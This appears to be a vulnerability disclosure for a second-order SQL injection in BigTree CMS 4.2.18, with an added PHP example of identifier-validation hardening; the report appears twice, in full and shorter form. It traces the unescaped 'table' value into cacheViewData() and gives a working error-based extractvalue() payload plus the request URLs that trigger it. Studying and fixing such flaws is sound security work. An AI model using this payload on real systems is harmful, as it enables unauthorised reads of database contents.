FILE:
\BigTree-CMS-4.2.18\core\admin\modules\developer\modules\views\create.php
First, the view is created:
```php
$view_id = $admin->createModuleView($module,$title,$description,$table,$type,$options,$fields,$actions,$related_form,$preview_url);
```
The flawed parameter is `table`.
Then search the view:
\BigTree-CMS-4.2.18\core\admin\ajax\auto-modules\views\searchable-page.php
```php
// Grab View Data
if (isset($_GET["view"])) {
    $bigtree["view"] = BigTreeAutoModule::getView(sqlescape($_GET["view"]));
}
// ......
$data = BigTreeAutoModule::getSearchResults($bigtree["view"],$page,$search,$sort,false);
```

```php
// core/inc/bigtree/auto-modules.php
static function getView($id,$decode_ipl = true) {
    global $cms;
    if (is_array($id)) {
        $id = $id["id"];
    }
    // only the view id is escaped; the row's stored "table" value is returned as-is
    $view = sqlfetch(sqlquery("SELECT * FROM bigtree_module_views WHERE id = '".sqlescape($id)."'"));
    // ......

static function getSearchResults($view,$page = 1,$query = "",$sort = "id DESC",$group = false) {
    // Check to see if we've cached this table before.
    self::cacheViewData($view);
    // ......

static function cacheViewData($view) {
    // $view["table"] is concatenated into the query without escaping
    $q = sqlquery("SELECT * FROM bigtree_pending_changes WHERE `table` = '".$view["table"]."' AND item_id IS NULL");
}
```
```
csrf_token_5TK1XAX747RXJ9X7496WHQ3F46C8134H=EINM%2FLjgLccbJjtUPYyVswTRkk7nZa%2Bs6Xb%2BPTLi8Gs%3D&title=111111&preview_url&description=&table=123_123%27 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#&related_form=&type=searchable&options=%7B%22filter%22%3A%22%22%2C%22sort%22%3A%22%60asdf%60%60+ASC%22%2C%22per_page%22%3A%2215%22%7D&fields%5Basdf%60%5D%5Bwidth%5D=748&fields%5Basdf%60%5D%5Btitle%5D=Asdf%60&fields%5Basdf%60%5D%5Bparser%5D=&actions%5Bedit%5D=on&actions%5Bdelete%5D=on
```
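The flow above is a second-order injection: the `table` value is stored when the view is created and only becomes dangerous when `cacheViewData()` splices it into a query unescaped. The following added example (not BigTree code, and not the project's fix) rebuilds that concatenation with the PoC payload so the resulting query text is visible, and beside it shows one way to harden the same function: since `table` names a database table, validate it as a MySQL identifier before it is used as a value or as a table name, and still escape it when it is used as a value. `escape_value()`, `vulnerable_query()`, `hardened_query()` and `is_safe_identifier()` are hypothetical names chosen here; the view row is constructed inline and no database is needed.

```php
<?php
// Added illustration, not BigTree code. Shows how the stored "table" value
// reaches the query built in cacheViewData(), and one way to harden it.
declare(strict_types=1);

// Stand-in for BigTree's sqlescape(): escapes string *values* only.
// (Hypothetical helper; BigTree ships its own sqlescape().)
function escape_value(string $v): string {
    return addslashes($v);
}

// Vulnerable pattern, mirroring cacheViewData(): $view["table"] was read
// back from bigtree_module_views and is concatenated without escaping.
function vulnerable_query(array $view): string {
    return "SELECT * FROM bigtree_pending_changes WHERE `table` = '"
        . $view["table"] . "' AND item_id IS NULL";
}

// A table name is an identifier: allow only unquoted MySQL identifier
// characters and the 64-character limit. Anything else is rejected.
function is_safe_identifier(string $name): bool {
    return (bool) preg_match('/^[A-Za-z0-9_]{1,64}$/', $name);
}

// Hardened variant: reject non-identifiers up front (this should also run
// in createModuleView(), so a bad name is never stored), and escape the
// value anyway at the point of use.
function hardened_query(array $view): string {
    $table = (string) $view["table"];
    if (!is_safe_identifier($table)) {
        throw new InvalidArgumentException(
            "Invalid table name in module view {$view['id']}"
        );
    }
    return "SELECT * FROM bigtree_pending_changes WHERE `table` = '"
        . escape_value($table) . "' AND item_id IS NULL";
}

// Constructed sample row: the PoC "table" value from the report, URL-decoded.
$view = [
    "id"    => 18,
    "table" => "123_123' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#",
];

// The unescaped value closes the string literal and appends the
// error-based extractvalue() expression; "#" comments out the rest.
echo vulnerable_query($view), PHP_EOL;

// The hardened version refuses the same row before any SQL is built.
try {
    echo hardened_query($view), PHP_EOL;
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), PHP_EOL;
}
```

Escaping alone at the point of use would stop this particular payload, but the same stored name is also used as a table name elsewhere in auto-module queries, where quoting as a value does not apply; validating it as an identifier both when it is saved and when it is read covers both uses.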
As mentioned in the other SQL injection report, Developers already have access to direct PHP calls through column parsers in modules so this doesn't lead to an escalation of existing privileges or additional data leakage.
SQL injection in bigtreecms 4.2.18
FILE:
\BigTree-CMS-4.2.18\core\admin\modules\developer\modules\views\create.php
First, create the view:
```php
$view_id = $admin->createModuleView($module,$title,$description,$table,$type,$options,$fields,$actions,$related_form,$preview_url);
```
The flawed parameter is `table`.
Then search the view:
\BigTree-CMS-4.2.18\core\admin\ajax\auto-modules\views\searchable-page.php
Continue into:
\BigTree-CMS-4.2.18\core\inc\bigtree\auto-modules.php
Here the variable `$view["table"]` has a SQL injection vulnerability.
POC:
1. Add a module:
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/add/
2. Add a view for the module, setting `table` to:
```
table=123_123%27 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
```
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/views/add/?module=18
3. Requesting this URL leads to the SQL injection:
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/ajax/auto-modules/views/searchable-page/?sort=&sort_direction=ASC&view=18&module=&search=&page=1
4. Requesting these URLs leads to the SQL injection too:
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/modules_name_at_one_step/
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/views/style/module_id/